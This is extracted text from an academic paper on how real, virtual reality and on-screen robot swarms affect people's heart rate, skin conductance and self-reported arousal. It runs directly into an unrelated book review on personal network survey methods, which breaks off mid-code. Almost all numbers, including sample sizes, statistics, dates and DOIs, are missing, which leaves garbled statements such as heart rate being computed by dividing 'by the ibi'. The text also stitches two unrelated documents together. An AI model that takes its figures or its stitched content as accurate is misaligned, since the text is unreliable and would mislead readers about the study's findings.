the powerlab t was connected via usb to a laptop computer running mac osx yosemite. we used the software labchart to record the physiological responses acquired by the powerlab t data acquisition system. we used an infrared photoelectric sensor (i.e., a photopletismograph) to measure the blood volume pulse (bvp) of our participants (i.e., changes in the pulsatile blood flow). the blood volume pulse can be retrieved from the photopletismograph from the peripheral parts of the human body such as on the fingers. we can compute the heart rate from the blood volume pulse. firstly, we calculate the inter-beat interval (ibi) (i.e., time in seconds between two peaks in the blood volume pulse). then, we calculate the heart rate by dividing by the ibi. for instance, if the ibi of an individual is s, this individual’s heart rate is bpm. fig. a shows the blood volume pulse of a participant during a time window of s. the photopletismograph was attached to the index finger of a participants dominant hand. the photopletismograph was directly connected to the powerlab t. to monitor the electrodermal activity of our participants, we used brightly polished stainless steel bipolar electrodes connected to the gsr amp device. these bipolar electrodes were attached to the medial phalanxes of the index and middle fingers of a participants non-dominant hand. in order to monitor the skin conductance, the gsr amp device applies a direct constant voltage between the bipolar electrodes. the constant voltage is small enough (i.e., mv) to prevent the participants from feeling it. as the voltage is known and constant ( mv), the gsr amp device can measure the current between the bipolar electrodes. when the current is known, the gsr amp device can calculate the conductance of the skin by applying the ohm’s law (conductance is the current measured between the electrodes divided by the constant voltage applied by the gsr amp device between the electrodes). fig. b shows the skin conductance of a participant during a time window of s. environment and robot behaviour in all of the three sessions of our experimental scenario (i.e., real robots, virtual reality, screen simulation), we used a square environment of dimension � m. fig. shows the environment of each of the three sessions. at the beginning of each session, robots are randomly placed in the environment. when an experiment starts, the robots perform a random walk with obstacle avoidance behaviour for a period of s. each robot executes the two following steps: i) it drives straight with a constant velocity of cm/s, podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ and ii) it changes its direction when it encounters either a robot or an obstacle in the direction of movement (i.e., it turns in place until the obstacle is no longer detected in the front part of its chassis). robot platform the platform used in this study is the wheeled e-puck robot (see fig. ) equipped with an extension board. the e-puck robot is designed for educational and research purposes (mondada et al., ). the extended version of the e-puck robot is cm high and has a diameter of cm. in this study, we used only a limited subset of the sensors and actuators available to the e-puck robot: the proximity sensors, and the wheel actuators. see mondada et al. ( ) and gutiérrez et al. ( ) for further details and for a complete list of the sensors and actuators available on the e-puck platform. 
we programmed the e-puck robots using the software infrastructure described in garattoni et al. ( ). participants we recruited participants from the campus population of the université libre de bruxelles. all participants were between and years old with an average age of . years old (sd = . ). we considered current or anterior cardiovascular problems that could act on the central nervous system as exclusion criteria (i.e., we excluded potential participants with cardiovascular problems). our participants received an informed consent form explaining that they were filmed during the experiment and that their physiological responses were being collected for research purpose only. at the end of the experiment, we offered a v financial incentive for participation. figure physiological measures. (a) the graph of a participant’s blood volume pulse during s. the bvp does not have a standard unit. the x-axis is the time in minutes since the beginning of the recording. the time between two peaks (depicted with two dots connected with a line on the picture) is called the inter-beat interval (ibi). the participant’s heart rate (the number of beats per minute) is computed by dividing by the inter-beat interval. in this example, the mean heart rate of the parti- cipant during these s is of bpm. (b) the graph of a participant’s skin conductance during s. the skin conductance’s unit is the microsiemens (y-axis). the x-axis is the time in minutes since the beginning of the recording. the skin conductance is computed by measuring the current flowing between two electrodes and by dividing this current by a constant voltage applied between the electrodes. the skin conductance level of this participant during these s is of . ms. podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ ethics statement our participants gave their written informed consent. the experiment was approved by the ethics committee of the faculty of psychology, université libre de bruxelles (approval number: / ). experimental procedure we conducted our experiments in the robotic experiment room of the artificial intelligence laboratory at the université libre de bruxelles. upon arrival, we explained to the participant that she was going to supervise, i.e., watch attentively, a swarm of robots with three different types of visualization interfaces (i.e., on a computer screen, in a virtual reality headset and in reality with real robots). we then showed to the participant the swarm of robots displayed in the three visualization interfaces. the participant was allowed to look at a computer screen displaying a top view of a swarm of robots, to wear the virtual reality headset and to look at the real robots. once the participant was familiar with the three visualization interfaces, we presented and explained how to answer the electronic version of the sam questionnaire. then, we invited the participant to read and sign the consent form. we then asked the participant to wash their hands in clear water (i.e., with no soap) and to remain seated on a chair placed in a corner of the environment used for the real robots session (see fig. ). we attached the participant to two physiological sensors (i.e., a pulse transducer for measuring the participants cardiovascular activity and two finger electrodes for measuring the participants electrodermal activity). we proceeded with a min rest period in order to collect the participant’s physiological baseline (i.e., physiological responses at rest). 
after the min rest period, we started the first session. after each session, we asked the participant to answer the sam questionnaire. before starting the next session of the experiment, we collected the participant's baseline during an additional min rest period. this min rest period allowed the participant to return to normal physiological activity. during the whole duration of the experiment, the participant remained seated on the same chair. during the real robots session, the participant was immersed in the environment in which the robots were randomly moving. prior to the virtual reality session, we attached the virtual reality headset to the participant. prior to the screen simulation session, we placed a computer screen in front of the participant. after the experiment ended, we detached the sensors from the participant and conducted a brief interview with her. during the interview, we explained to the participant the goal of the study. then, we answered our participant's questions. we finished the experiment by thanking the participant and by giving the participant the v incentive. the entire experiment's duration was min per participant. figure : an e-puck robot used in our experiments. the proximity sensors are used to detect and avoid nearby robots. the wheel actuators are set to a speed of cm/s. data analysis and results out of the participants who took part in the experiment, we had to remove the physiological data (i.e., heart rate and skin conductance) of five participants due to sensor misplacement. we, however, kept the self-reported data (i.e., valence and arousal values reported by the sam questionnaire) of these five participants. in the remainder of this section, we analyse the psychophysiological data of participants ( female and male) and the self-reported data of participants ( female and male). we conducted our analyses with the r software (r core team, ) by performing a repeated measures design analysis. because the data were not normally distributed, we did not use the repeated measures anova test (as that test assumes a normal distribution). rather, we used a non-parametric friedman test to analyse both the psychophysiological data and the self-reported data (i.e., the sam questionnaire). the friedman test is a rank-based test that does not make any assumption about the distribution of the data. in our case, the friedman test's null hypothesis is that the medians of the three sessions real robots, virtual reality and screen simulation are the same. in the case of statistical significance of the friedman test (i.e., at least one session has a different median), we performed a wilcoxon signed-rank test to evaluate the significance of the difference between sessions. when the wilcoxon signed-rank test performed on two sessions is significant, we can conclude that the medians of these two sessions are significantly different. we applied a bonferroni-holm correction to the p-values returned by the wilcoxon signed-rank tests to control for type i errors (i.e., rejecting the null hypothesis when it is true). in addition to determining the effect of the reality gap on our participants, we also determined whether psychophysiological data and self-reported data were correlated (e.g., whether skin conductance is correlated with arousal, or whether arousal and valence are correlated).
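the testing pipeline described here (friedman test, post-hoc wilcoxon signed-rank tests with a bonferroni-holm correction), together with the spearman rank-order correlation described next, can be sketched in a few lines. the snippet below is our own python illustration with invented numbers; it is not the authors' r code.

```python
import numpy as np
from scipy import stats
from statsmodels.stats.multitest import multipletests

# toy data: one row per participant, one column per session
# (real robots, virtual reality, screen simulation); values are invented
scl = np.array([[6.1, 5.2, 5.0],
                [7.3, 6.8, 6.5],
                [5.9, 5.1, 4.8],
                [8.0, 7.1, 7.2],
                [6.6, 6.0, 5.7]])

# friedman test: is at least one session median different?
chi2, p = stats.friedmanchisquare(scl[:, 0], scl[:, 1], scl[:, 2])

# post-hoc pairwise wilcoxon signed-rank tests with a bonferroni-holm correction
pairs = [(0, 1), (0, 2), (1, 2)]
raw_p = [stats.wilcoxon(scl[:, a], scl[:, b]).pvalue for a, b in pairs]
reject, holm_p, _, _ = multipletests(raw_p, alpha=0.05, method="holm")

# spearman rank-order correlation, e.g. between pooled skin conductance and arousal ratings
arousal = np.array([4, 3, 3, 5, 6, 2, 5, 4, 6, 3, 5, 4, 7, 5, 4])
rho, p_rho = stats.spearmanr(scl.flatten(), arousal)
print(chi2, p, dict(zip(pairs, holm_p)), rho, p_rho)
```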
in order to determine this correlation, we performed a spearman’s rank-order correlation test. we present in table the results of the psychophysiological and self-reported data (i.e., median and friedman’s mean rank of heart rate, scl, arousal and valence) in each session (i.e., real robots, virtual reality, screen simulation) as well as the inference statistics of the friedman tests (i.e., p-values and � ). psychophysiological data we did not find any main effect of the reality gap on our participants’ heart rate (� ( ) = . , p = . ). however, we found a main effect of the reality gap on our participants’ scl (� ( ) = . , p < . ). pairwise comparisons on the scl data podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ showed a statistical difference between the virtual reality session and the real robots session (z = . , p < . ) and between the screen simulation session and the real robots session (z = . , p < . ) but not between the screen simulation session and the virtual reality session (z = . , p = . ), see fig. b. self-reported data we found a main effect of the reality gap on our participants’ arousal (� ( ) = , p < . ) and on our participants’ valence (� ( ) = . , p < . ). pairwise comparisons on the arousal data showed statistical differences between the screen simulation session and the real robots session (z = . , p < . ) and between the screen simulation session and the virtual reality session (z = . , p < . ). there was no statistical difference between the virtual reality session and the real robots session (z = . , p = . ), see fig. c. pairwise comparisons on the valence data showed statistical differences between the virtual reality session and the real robots session (z = . , p < . ) and between the screen simulation session and the real robots session (z = , p < . ). pairwise comparisons do not show any statistical difference between the screen simulation session and the virtual reality session (z = . , p = . ), see fig. d. correlations in addition to studying the effect of the reality gap on our participants, we investigated whether or not some of the dependent variables (i.e., heart rate, skin conductance, arousal and valence) were pair-wise correlated. in order to calculate a correlation between psychophysiological data and self-reported data (e.g., correlation between skin conductance and arousal) we only took into account the self-reported data of the participants whose psychophysiological data had not been rejected (due to sensor misplacement). for the correlation test between arousal and valence we took the participant data points. we did not find any correlation within each of the three sessions (i.e., there was no correlation for any pair-wise dependent variable within the real robots session nor the virtual reality session nor the screen simulation session). we, therefore, investigated whether there was some correlations when the data of each condition was pooled together (e.g., we aggregated skin conductance values from the three sessions). regarding correlation between psychophysiological data and self-reported data, we found a correlation between skin conductance and valence (ρ = . , p < . ) and a weak correlation between skin conductance and arousal (ρ = . , p = . ). table results of the psychophysiological data and of the self-reported data. we provide the median and the friedman’s mean rank (in parentheses) of the three sessions (real robots, virtual reality, screen simulation). 
we also provide the inference statistics of the friedman test (i.e., χ² and p). dependent variable n real robots virtual reality screen simulation χ² p heart rate . ( . ) . ( ) . ( . ) χ²( ) = . . scl . ( . ) . ( . ) . ( . ) χ²( ) = . < . arousal ( . ) ( . ) ( . ) χ²( ) = < . valence ( . ) ( . ) ( . ) χ²( ) = . < . there was no correlation between heart rate and valence and between heart rate and arousal. concerning the self-reported data, we found a correlation between arousal and valence (ρ = . , p = . ). we did not find any correlation between heart rate and skin conductance. gender effect and session order effect finally, we also studied the gender effect (i.e., whether females and males differ in their results) and the session order effect (i.e., whether the participants become habituated to the experiment). we analysed the gender effect by splitting the males' and females' results into two groups for each dependent variable (i.e., heart rate, skin conductance, arousal and valence) and each condition (i.e., screen simulation, virtual reality, real robots). we compared these two groups with a wilcoxon rank-sum test—the equivalent of the wilcoxon signed-rank test for independent groups. we did not find any statistically significant difference between males and females in any condition, for any dependent variable. we studied the session order effect as follows. for each condition and for each dependent variable, we separated the results into three groups according to whether the participants encountered the session first, second or third. we compared the three groups with a kruskal-wallis test—a non-parametric test similar to a friedman test but for independent groups. we did not find any statistically significant difference among the three groups in any session, for any dependent variable, suggesting that the session order had no significant effect on our participants. figure : (a) boxplots of the heart rate, (b) skin conductance level, (c) arousal and (d) valence. we visually report the median value of each session with the bold horizontal line. we report the outliers with the dots. two boxplots are connected when the sessions are significantly different. discussion and conclusion in this paper, we presented a study on the effect of the reality gap on the psychophysiological reactions of humans interacting with a robot swarm. we had two hypotheses. the first hypothesis stated that humans interacting with a real (i.e., non-simulated) robot swarm have stronger psychophysiological reactions than if they were interacting with a simulated robot swarm. the second hypothesis stated that humans interacting with a simulated robot swarm displayed in a virtual reality environment have stronger psychophysiological reactions than if they were interacting with a simulated robot swarm displayed on a computer screen. both the self-reported data (i.e., arousal and valence) and the psychophysiological data (i.e., skin conductance) show that the reality gap has an effect on human psychophysiological reactions. our participants had stronger psychophysiological reactions when they were confronted with a real swarm of robots than when they were confronted with a simulated robot swarm (in virtual reality and on a computer screen). these results confirm our first hypothesis.
of course, it is not always possible for researchers to conduct a human-swarm interaction study with real robots, essentially because real robots are still very expensive for a research lab and real robot experiments are time consuming. it is, therefore, not realistic to expect human-swarm interaction researchers to conduct human-swarm interaction experiments with dozens or hundreds of real robots. for this reason, we decided to investigate the possibility of using virtual reality in order to mitigate the effect of the reality gap. to the best of our knowledge, virtual reality has yet never been used in the research field of human-swarm interaction and is little studied in social robotics (li, ). only the self-reported arousal show that our participants had stronger reactions during simulation in virtual reality than during simulation on a computer screen. with these results, we can not strongly confirm our second hypothesis. however, the results of the skin conductance and the self-reported valence, combined with the significant results of the arousal, both show a trend of our participants to have stronger psychophysiological responses in virtual reality than in front of a computer screen. in this paper, we designed our experiment based on a purely passive interaction scenario. in a passive interaction scenario, human operators do not issue commands to a robot swarm. we motivated our choice of a passive interaction by the fact that an active interaction could influence the human psychophysiological state (making it difficult to separate the effect of the active interaction and the effect of the reality gap on our participants’ psychophysiological state). however, now that we have shown the effect of the reality gap in a purely passive interaction scenario, future work should focus on this effect in an active interaction scenario in which human operators do issue commands to a robot swarm. for instance, we could use the results presented in this paper podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ as a baseline and compare them with those of an active interaction scenario in which human operators have to guide a swarm in an environment. in human-swarm interaction, as for any interactive system, it is fundamental to understand the psychological impact of the system on a human operator. to date, in human-swarm interaction research, such understanding is very limited, and worse is often based purely on the study of simulated systems. in this study, we showed that performing a human-swarm interaction study with real robots, compared to simulated robots, significantly changes how humans psychophysiologically react. we, therefore, recommend to use as much as possible real robots for human-swarm interaction research. we also showed that in simulation, a swarm displayed in virtual reality tends to provoke stronger responses than a swarm displayed on a computer screen. these results, therefore, tend to show that if it is not possible for a researcher to use real robots, virtual reality is a better choice than simulation on a computer screen. even though more research should focus on this statement, we encourage researchers in human-swarm interaction to consider using virtual reality when it is not possible to use a swarm of real robots. 
additional information and declarations funding this work was partially supported by the european research council through the erc advanced grant “e-swarm: engineering swarm intelligence systems” (contract ). rehan o’grady and marco dorigo received support from the belgian f.r.s.–fnrs. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: european research council through the erc advanced grant “e-swarm: engineering swarm intelligence systems”: . competing interests marco dorigo is an academic editor for peerj computer science. author contributions � gaëtan podevijn conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. � rehan o’grady conceived and designed the experiments, reviewed drafts of the paper. � carole fantini-hauwel conceived and designed the experiments, contributed reagents/ materials/analysis tools, reviewed drafts of the paper. � marco dorigo conceived and designed the experiments, contributed reagents/materials/ analysis tools, reviewed drafts of the paper. podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): ethics committee of the faculty of psychology, université libre de bruxelles, approval number: / . data deposition the following information was supplied regarding data availability: the raw data has been supplied as supplemental dataset files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information. references amraii sa, walker p, lewis m, chakraborty n, sycara k. . explicit vs. tacit leadership in influencing the behavior of swarms. in: proceedings of ieee/rsj international conference on robotics and automation (icra). piscataway: ieee press, – . bashyal s, venayagamoorthy gk. . human swarm interaction for radiation source search and localization. in: swarm intelligence symposium. piscataway: ieee, – . bethel cl, burke jl, murphy rr, salomon k. . psychophysiological experimental design for use in human-robot interaction studies. in: proceedings of the international symposium on collaborative technologies and systems (cts). piscataway: ieee, – . boucsein w. . electrodermal activity. second edition. new york: springer science & business media. cacioppo jt, tassinary lg, berntson gg. . handbook of psychophysiology. vol. . new york: cambridge university press. carroll jm. . human-computer interaction: psychology as a science of design. annual review of psychology ( ): – doi . /annurev.psych. . . . de la croix j-p, egerstedt m. . controllability characterizations of leader-based swarm interactions. in: aaai fall symposium series technical reports. washington, d.c.: aaai press. dorigo m, birattari m, brambilla m. . swarm robotics. scholarpedia ( ): doi . /scholarpedia. . 
dorigo m, floreano d, gambardella lm, mondada f, nolfi s, baaboura t, birattari m, bonani m, brambilla m, brutschy a, burnier d, campo a, christensen al, decugnière a, di caro g, ducatelle f, ferrante e, förster a, guzzi j, longchamp v, magnenat s, martinez gonzales j, mathews n, montes de oca m, o’grady r, pinciroli c, pini g, rétornaz p, roberts j, sperati v, stirling t, stranieri a, stützle t, trianni v, tuci e, turgut ae, vaussard f. . swarmanoid: a novel concept for the study of heterogeneous robotic swarms. ieee robotics & automation magazine ( ): – doi . /mra. . . fasola j, matari�c m. . a socially assistive robot exercise coach for the elderly. journal of human-robot interaction ( ): – doi . /jhri. . .fasola. garattoni l, francesca g, brutschy a, pinciroli c, birattari m. . software infrastructure for e-puck (and tam). technical report tr/iridia/ - . brussels: iridia, université libre de bruxelles. available at http://iridia.ulb.ac.be/~lgarattoni/uploads/ / / / / / iridiatr - .pdf. podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /annurev.psych. . . http://dx.doi.org/ . /scholarpedia. http://dx.doi.org/ . /mra. . http://dx.doi.org/ . /jhri. . .fasola http://iridia.ulb.ac.be/~lgarattoni/uploads/ / / / / /iridiatr - .pdf http://iridia.ulb.ac.be/~lgarattoni/uploads/ / / / / /iridiatr - .pdf http://dx.doi.org/ . /peerj-cs. https://peerj.com/ gutiérrez a, campo a, dorigo m, amor d, magdalena l, monasterio-huelin f. . an open localization and local communication embodied sensor. sensors ( ): – doi . /s . hegel f, muhl c, wrede b, hielscher-fastabend m, sagerer g. . understanding social robots. in: proceedings of the nd international conferences on advances in computer-human interactions (achi ). piscataway: ieee, – . kidd c, breazeal c. . effect of a robot on user perceptions. in: proceedings of the ieee/rsj international conference on intelligent robots and system (iros) volume . piscataway: ieee computer society press, – . kolling a, sycara k, nunnally s, lewis m. . human swarm interaction: an experimental study of two types of interaction with foraging swarms. journal of human-robot interaction ( ): – doi . /jhri. . .kolling. kolling a, walker p, chakraborty n, sycara k, lewis m. . human interaction with robot swarms: a survey. ieee transaction on human-machine systems ( ): – doi . /thms. . . lang pj. . behavioral treatment and bio-behavioral assessment: computer applications. in: sidowski jb, johnson jh, williams th, eds. technology in mental health care delivery systems. norwood: ablex, – . leite i, pereira a, martinho c, paiva a. . are emotional robots more fun to play with? in: proceedings of the th ieee international symposium on robot and human interactive communication (roman). piscataway: ieee press, – . li j. . the benefit of being physically present: a survey of experimental works comparing copresent robots, telepresent robots and virtual agents. international journal of human- computer studies : – doi . /j.ijhcs. . . . mehrabian a. . pleasure-arousal-dominance: a general framework for describing and measuring individual differences in temperament. current psychology ( ): – doi . /bf . mondada f, bonani m, raemy x, pugh j, cianci c, klaptocz a, magnenat s, zufferey j-c, floreano d, martinoli a. . the e-puck, a robot designed for education in engineering. 
in: proceedings of the th conference on autonomous robot systems and competitions. portugal: instituto politècnico de castelo branco, – . nagavalli s, chien s-y, lewis m, chakraborty n, sycara k. . bounds of neglect benevolence in input timing for human interaction with robotic swarms. in: proceedings of acm/ieee international conference on human-robot interaction. new york: acm, – . nagi j, giusti a, gambardella lm, di caro ga. . human-swarm interaction using spatial gestures. in: proceedings of the th ieee/rsj international conference on intelligent robots and systems (iros). piscataway: ieee computer society, – . nagi j, ngo h, gambardella l, di caro ga. . wisdom of the swarm for human-swarm interaction. in: proceedings of the ieee international conference on robotics and automation (icra). piscataway: ieee, – . nunnally s, walker p, lewis m, kolling a, chakraborty n, sycara k. . connectivity differences between human operators of swarms and bandwidth limitations. in: proceedings of the third international conference on swarm, evolutionary, and memetic computing. berlin, heidelberg: springer, – . podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s http://dx.doi.org/ . /jhri. . .kolling http://dx.doi.org/ . /thms. . http://dx.doi.org/ . /j.ijhcs. . . http://dx.doi.org/ . /bf http://dx.doi.org/ . /peerj-cs. https://peerj.com/ pendleton b, goodrich ma. . scalable human interaction with robotic swarms. in: proceedings of the aiaa infotech@aerospace conference. reston: american institute of aeronautics and astronautics, – . pereira a, martinho c, leite i, paiva a. . icat, the chess player: the influence of embodiment in the enjoyment of a game. in: proceedings of the th international joint conference on autonomous agents and multiagent systems. richland: international foundation for autonomous agents and multiagent systems, – . podevijn g, o’grady r, mathews n, gilles a, fantini-hauwel c, dorigo m. . investigating the effect of increasing robot group sizes on the human psychophysiological state in the context of human-swarm interaction. swarm intelligence ( ): – doi . /s - - - . podevijn g, o’grady r, nashed ysg, dorigo m. . gesturing at subswarms: towards direct human control of robot swarms. towards autonomous robotic systems– th annual conference, taros volume of lecture notes in computer science. berlin: springer, – . powers a, kiesler s, fussell s, torrey c. . comparing a computer agent with a humanoid robot. in: proceedings of the nd acm/ieee international conference on human-robot interaction (hri). new york: acm, – . r core team. . r: a language and environment for statistical computing. vienna, austria: r foundation for statistical computing. available at http://www.r-project.org/. setter t, fouraker a, kawashima h, egerstedt m. . haptic interactions with multi-robot swarms using manipulability. journal of human-robot interaction ( ): – doi . /jhri. . .setter. sweetser p, wyeth p. . gameflow: a model for evaluating player enjoyment in games. computers in entertainment ( ): doi . / . . wainer j, feil-seifer dj, shell da, matari�c mj. . embodiment and human-robot interaction: a task-based perspective. in: proceedings of the th ieee international symposium on robot and human interactive communication (roman). piscataway: ieee press, – . walker p, amraii sa, lewis m, chakraborty n, sycara k. . human control of leader-based swarms. in: ieee international conference on systems, man, and cybernetics (smc). piscataway: ieee press, – . 
walker p, nunnally s, lewis m, kolling a, chakraborty n, sycara k. . neglect benevolence in human-swarm interaction with communication latency. in: proceedings of the third international conference on swarm, evolutionary, and memetic computing. berlin: springer, – . wrobel j, wu y-h, kerhervé h, kamali l, rigaud a-s, jost c, le pévédic b, duhaut d. . effect of agent embodiment on the elder user enjoyment of a game. in: proceedings of the th international conference on advances in computer-human interactions (achi). red hook: iaria xps press, – . podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - - http://www.r-project.org/ http://dx.doi.org/ . /jhri. . .setter http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/ investigating the effect of the reality gap on the human psychophysiological state in the context of human-swarm interaction introduction related literature methodology data analysis and results discussion and conclusion references © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /) issue | vol. article | doi: . /connections- . connections commentary: how to do personal network surveys: from name generators to statistical modeling isidro maya-jariego* universidad de sevilla seville, andalucía spain. *e-mail: isidromj@us.es abstract the book “conducting personal network research” is a conceptual and methodological introduction to the structural study of personal networks. it is part of a series of recent monographs that have begun to systematize the knowledge generated in this area in recent decades (crossley et al., ; mccarty et al., ; perry et al., ). in this case, the authors have dedicated a large part of their career to the empirical investigation of the interpersonal relationships, interaction contexts, and social integration processes of immigrants, along with other groups in vulnerable situations. with this publication, all this experience is now reflected in a clear and comprehensive introductory text. this book explains how to integrate relational data collection and analysis with survey research. it systematically presents the strategies to estimate the size of personal networks. finally, it describes how to fit statistical analysis to relational data, including regression models, multi-level models, and longitudinal models. keywords personal networks, name generators, statistical modelling, network surveys, ethics in research. the first time i showed the visualization of the personal network to a respondent i had the feeling of being in front of a tool with enormous potential. it was a case of a student who had just adopted a metropolitan lifestyle, moving almost daily between the city where she lived and the capital where she was studying at the university. the analysis of the structural properties of her personal network was a good way to describe the distribution of her relationships (and her life) between different socio- geographic spaces. on the other hand, by presenting the graph of her personal network, the respondent showed some surprise when she discovered some unknown structural properties of her own personal network. the visualization made her aware of some characteristics of her social world, although it had been designed based on the information she had provided. 
besides, the graphic representation natu- rally prompted a biographical discourse, providing explanations that helped to understand the contexts of interaction and the life events that had shaped her personal network. many of the potentials in those first experiences that research has subsequently developed were still at an early stage: the statistical analysis of the structural properties, the development of mixed methods strategies, the incorporation of the study of individual differences, the formulation of personal networks typologies, etc. the book conducting personal network research is a conceptual and methodological introduction to the structural study of personal networks. it forms part of a series of three new monographs aimed at systematizing the knowledge produced in this area in recent decades (crossley et al., ; mccarty et al., ; perry et al., ). in this case, the authors dedicated a large part of their career to empirical research on interpersonal relationships, contexts connections of interaction, and social integration processes of immigrants, along with other groups in situations of vulnerability. in this publication, all this experience is now reflected in a clear and comprehensive introductory text. one part of the book combines survey methodology with the study of personal networks. accordingly, it presents some basic notions about conducting sampling, how to ask questions, or which type of statistical analysis can be used at different levels of measurement. this type of content is clearly relevant for conducting surveys in general, and not only to those in which samples of personal networks are obtained. however, they help to understand the integration of personal network modules into surveys. as we will describe below, the main contribution of the book is the systematization of existing knowledge about the collection, analysis, and visualization of personal networks. this book review and commentary is a brief personal assessment of two methodological strategies that have emerged in recent decades as an effective way of analyzing personal networks, in part with the outstanding contribution of the authors of the book. the first of these strategies is the design of a pragmatic procedure to efficiently capture the diversity of personal networks, especially, if we consider the time-consuming nature of handling this type of relational data in surveys. the second is the statistical summary of the structural properties of personal network samples. among other reasons, because it is common to subsequently use these indicators in statistical analyzes with samples of respondents. anyway, before going into these two central contributions of the book, i will first provide a short reading guide to the introduction to personal network analysis. a reading guide on personal networks the three books on the study of personal networks previously mentioned have a similar structure. they begin with the description of relational data collection procedures. next, they present the analysis and visualization strategies of personal network data. finally, they dedicate several chapters to statistical analysis models. however, as we will do next, we can also highlight some unique characteristics of each of them. social network analysis for ego-nets (crossley et al., ) places the study of personal networks in the context of mixed methods and brings it into relation with social theory. 
it starts with a general introduction to network analysis and explains how ego-networks can also be extracted from whole social networks. following the tradition of the manchester school, it presents how to integrate personal network data with qualitative information or with ethnographic strategies. based on scientific evidence, it presents interesting reflections on the nature of relationships and their mutual dependence on interaction contexts. the section on "narratives, typologies and case studies" is especially suggestive regarding the very concept of social relationship, as well as its variability depending on the contexts of interaction. finally, in the chapters on statistical analysis, it follows a formal mathematical approach. egocentric network analysis (perry et al., ) is a book with an eminently pragmatic approach. sometimes it even goes down to the instrumental level, with instructions on how to carry out the analyses, or even providing some lines of programming code. it presents the concepts very clearly and illustrates them with a magnificent selection of some of the best studies done in this area. this book clarifies the different analysis strategies to combine egocentric and sociocentric data. it shows, with a sociological approach, how personal networks can serve to characterize different types of sociability and different forms of community life. it also describes how short-term, casual, serial relationships with low levels of interpersonal commitment predominate in the contemporary world. conducting personal network research (mccarty et al., ) is an introductory book on personal network analysis that explains how to integrate relational data collection and analysis with survey research. it systematically presents the strategies to estimate the size of personal networks. finally, it describes how to fit statistical analysis to relational data, including regression models, multi-level models, and longitudinal models. consequently, these are three books that complement each other. with these three volumes, the reader can have a comprehensive and updated overview of the study of the structure of personal networks. below we focus on evaluating two of the fundamental contributions of the book by mccarty et al. ( ) that we anticipated before. name generators and relations generators the handbook defines itself as "a practical guide." in that sense, the two sections that best respond to the book's subtitle are those focused on "delineating personal networks" (chapter ) and "collecting data about ties between alters" (chapter ). these are two central methodological strategies in the collection of relational data. furthermore, both name generators and relationship generators have important substantive implications, since they refer to the types of social contexts in which the individual is involved, as well as to the nature of the relationships. on the one hand, defining the boundaries of the network impacts the types of social contexts and the types of personal contacts on which we obtain information. on the other hand, the type of links is a decisive factor for the structure finally observed (and, consequently, for information flows and social support, or social control processes). the work provides a comprehensive classification of the types of name generators. similarly, it systematically reviews the questions about alters and the relationships among them.
the reading shows that this is an area where there is now potential for greater (both conceptual and methodological) systematization regarding data collection. for example, it is common to differentiate whole networks from personal networks (e.g., indicating that the former refers to a bounded group in a predefined context, while the latter covers all the contexts, social circles, and social settings in which the individual participates) hâncean et al. ( ). on paper, however, nothing is preventing the analysis of whole networks from being applied to two different contexts (e.g. a neighborhood and a workplace simultaneously). the personal network approach can also be adopted in the systematic study of a single interaction context. as an example, we can describe the personal networks of a sample of fishermen limited to their relationships in the fishing port (maya-jariego et al., ). it is a matter of design. therefore, taking into account these (less frequent) possibilities can help to specify which elements define (and which do not) the differentiation between the two basic approaches to network analysis. something similar happens with name generators. it has normally been distinguished between (i) obtaining information about a previously defined list of alters and (ii) obtaining names without any previous suggestion. the originality of the name generator proposed by mccarty ( ) is based on the free recall of respondents, but at the same time requesting a fixed number of alters. it is a rare combination since traditionally free recalling entailed not imposing limits on the number of alters that could be mentioned (maya-jariego, ). the nature of social relations occupies a central space throughout this process. in practice, the definition of the edge is determinant of the structure of the network. normally, any subsequent analysis is based on the perception of alter-alter relationships by respondents. although informants tend to be relatively unreliable when describing social interaction, in the case of personal networks, such accuracy generally increases, partly because these are routine ties with which “ego” has a direct relationship. additionally, perceived relationships have value in themselves, to the extent that they condition individual behavior. innovations in the analysis and visualization of personal networks christopher mccarty published in an article on the structure of personal networks that established a kind of standard in analysis and visualization strategies, consisting of (i) collecting information on a fixed number of alters, along with the relations that they maintain between them, (ii) disregarding the ego, and (iii) applying to personal networks the same type of structural analysis that previously was applied to complete social networks (mccarty, ). in a way, the book can be read as a compendium of the innovations that have been produced over almost two decades following this scheme. next, we mention some of the most prominent and promising novelties. reducing information, cohesive subgroups, and visualization one of the factors that have contributed to the dissemination of this approach among social science researchers is the facility to integrate analysis of personal network samples with traditional statistical analysis models and strategies. therefore, a large part of the effort has focused on identifying the type of indicators that provide an adequate summary of the structural properties and composition of the network. 
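such summary indicators are typically computed with standard network-analysis tooling. the sketch below is our own illustration (not an example taken from the book) of the scheme just described: a fixed list of alters, the ego removed, and whole-network style indicators computed over the perceived alter-alter ties.

```python
import networkx as nx
from networkx.algorithms.community import greedy_modularity_communities

# toy personal network: alters named by one respondent and the alter-alter ties
# the respondent perceives; the ego is deliberately excluded from the graph
alters = ["a1", "a2", "a3", "a4", "a5", "a6"]
ties = [("a1", "a2"), ("a2", "a3"), ("a1", "a3"), ("a4", "a5"), ("a5", "a6")]

g = nx.Graph()
g.add_nodes_from(alters)
g.add_edges_from(ties)

# summary indicators of structural cohesion and subgroup organization, of the kind
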